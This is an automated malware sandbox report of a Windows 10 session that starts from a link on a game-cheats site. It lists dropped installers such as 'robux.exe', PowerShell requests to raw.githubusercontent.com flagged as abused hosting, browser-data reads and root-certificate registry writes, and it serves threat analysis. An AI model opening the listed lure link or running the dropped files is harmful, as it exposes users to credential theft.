Analysis
-
max time kernel
360s -
max time network
370s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
13-09-2024 20:37
Static task
static1
URLScan task
urlscan1
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 441 1616 powershell.exe 443 1616 powershell.exe -
pid Process 1616 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
pid Process 5412 OperaGXSetup.exe 5896 setup.exe 2628 setup.exe 5312 setup.exe 2336 setup.exe 3524 setup.exe 2524 Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe 5564 assistant_installer.exe 5452 assistant_installer.exe 5864 robux.exe -
Loads dropped DLL 5 IoCs
pid Process 5896 setup.exe 2628 setup.exe 5312 setup.exe 2336 setup.exe 3524 setup.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: setup.exe File opened (read-only) \??\D: setup.exe File opened (read-only) \??\F: setup.exe File opened (read-only) \??\D: setup.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 437 raw.githubusercontent.com 438 raw.githubusercontent.com -
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language assistant_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language melter.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OperaGXSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language assistant_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language robux.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 5924 timeout.exe 3472 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-656926755-4116854191-210765258-1000\{69D8332B-2C8D-40DE-A6E4-CDE51689F69B} msedge.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 setup.exe -
NTFS ADS 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 590365.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 905431.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 3064 msedge.exe 3064 msedge.exe 2784 msedge.exe 2784 msedge.exe 3752 identity_helper.exe 3752 identity_helper.exe 5548 msedge.exe 5548 msedge.exe 5148 msedge.exe 5148 msedge.exe 5148 msedge.exe 5148 msedge.exe 1612 msedge.exe 1612 msedge.exe 5304 msedge.exe 5304 msedge.exe 1616 powershell.exe 1616 powershell.exe 1616 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 41 IoCs
pid Process 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1616 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe -
Suspicious use of SendNotifyMessage 40 IoCs
pid Process 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe 2784 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5896 setup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2784 wrote to memory of 1512 2784 msedge.exe 83 PID 2784 wrote to memory of 1512 2784 msedge.exe 83 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 2324 2784 msedge.exe 84 PID 2784 wrote to memory of 3064 2784 msedge.exe 85 PID 2784 wrote to memory of 3064 2784 msedge.exe 85 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86 PID 2784 wrote to memory of 2100 2784 msedge.exe 86
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cheatsfinder.org/e5140e61⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe59d46f8,0x7fffe59d4708,0x7fffe59d47182⤵PID:1512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:22⤵PID:2324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:82⤵PID:2100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:12⤵PID:3476
-
-
